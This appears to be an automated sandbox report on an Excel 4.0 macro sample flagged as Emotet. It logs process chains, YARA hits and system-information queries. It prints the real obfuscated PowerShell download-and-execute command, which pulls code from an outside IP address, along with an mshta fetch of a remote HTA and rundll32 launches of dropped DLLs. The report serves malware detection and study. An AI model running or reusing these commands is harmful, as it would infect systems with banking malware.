Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: 364453688149503140239183.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\364453688149503140239183.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 12.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e90000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2850000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a30000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.b20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3020000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a30000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a30000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b80000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2860000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.470000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c90000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.25e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.440000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2dd0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.24f0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.30b0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ac0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.b20000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d00000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.5a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b50000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26d0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2860000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c60000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8f0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.b50000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.ae0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bc0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ec0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27e0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d00000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.b50000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
